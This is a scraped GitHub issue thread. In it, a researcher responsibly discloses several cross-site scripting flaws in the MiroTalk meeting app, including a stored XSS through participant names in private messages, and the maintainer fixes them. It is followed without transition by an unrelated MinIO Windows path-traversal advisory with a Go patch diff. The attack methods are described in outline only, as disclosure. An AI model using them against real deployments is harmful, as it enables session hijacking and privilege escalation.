> And some self-XSS popups that are not exploitable for other participants. Will only trigger a JS popup for the attacker himself. Should be fixed too but there is no security impact/risk leaving it as is.

For the name change, I found a way to disable the JS Popup and clean up :)  
For the file name, seems I can't do it, as it's read only, but is xss with no impact.

Thanks again so much for reporting this issue to me and for helping with debugging, much appreciated!

Copy link

Contributor Author

Hi @miroslavpejic85 ,

very nice. The self XSS for the name change function is now fixed.

I've found a remaining self XSS when joining a meeting. You may want to fix this too as it is the second input field presented to a user (after optionally choosing a room name).

You may want to restrict and filter the room name people can choose. A room name with </h1> or just </> bricks the loading screen.

Copy link

Contributor Author

Hi @miroslavpejic85 ,

sorry, I've found another XSS. This time it is a bit more hidden.

A user can choose an XSS payload as name when joining a web meeting. The XSS name will trigger a self XSS popup for the attacker himself. No impact for other participants.

However, the private messages feature allows to search for meeting participants and sending them a private message. When a message is sent, the chat will print a text like Private message to <peer_name>. Malicious peer name allows for XSS again.

Proof of Concept:

1.  Attacker chooses XSS as name during meeting join
2.  Another participant sends the attacker with XSS payload in his name a private message
3.  The victim who sent a message to the attacker triggers the JS payload

_Image1: Attacker sets his name to an xss payload_

_Image2: Victim want to send a private message to the attacker_

_Image3: Attacker's peer name is reflected in the chat which triggers XSS_

So the reflection of peer\_name for private messages must be validated and sanitized too.

Hi @l4rm4nd,  
Yeah you are right, can you try now please? should be fixed.  
Thank you!

Copy link

Contributor Author

> Hi @l4rm4nd, Yeah you are right, can you try now please? should be fixed. Thank you!

Looks good! Malicious HTML/JS is escaped properly.

Participants can also not choose malicious payloads anymore during meeting join:

Also within meeting a peer name cannot be changed to malicious JS/HTML on the frontend:

Great job and many thanks for your fast replies and implemented fixes!

🥇 👍

Good! It's a pleasure, Many thanks to you!

2 participants

CVE-2023-27054: Multiple Cross-Site Scripting (XSS) · Issue #139 · miroslavpejic85/mirotalk

Minio is a Multi-Cloud Object Storage framework. All users on Windows prior to version RELEASE.2023-03-20T20-16-18Z are impacted. MinIO fails to filter the `\` character, which allows for arbitrary object placement across buckets. As a result, a user with low privileges, such as an access key, service account, or STS credential, which only has permission to `PutObject` in a specific bucket, can create an admin user. This issue is patched in RELEASE.2023-03-20T20-16-18Z. There are no known workarounds.

@@ -22,6 +22,7 @@ import (

"net"

"net/http"

"path"

"path/filepath"

"runtime/debug"

"strings"

"sync/atomic"

@@ -349,7 +350,7 @@ func hasBadHost(host string) error {

// Check if the incoming path has bad path components,

// such as ".." and "."

func hasBadPathComponent(path string) bool {

path \= strings.TrimSpace(path)

path \= filepath.ToSlash(strings.TrimSpace(path)) // For windows '\\' must be converted to '/'

for \_, p := range strings.Split(path, SlashSeparator) {

switch strings.TrimSpace(p) {

case dotdotComponent:

Tag

#windows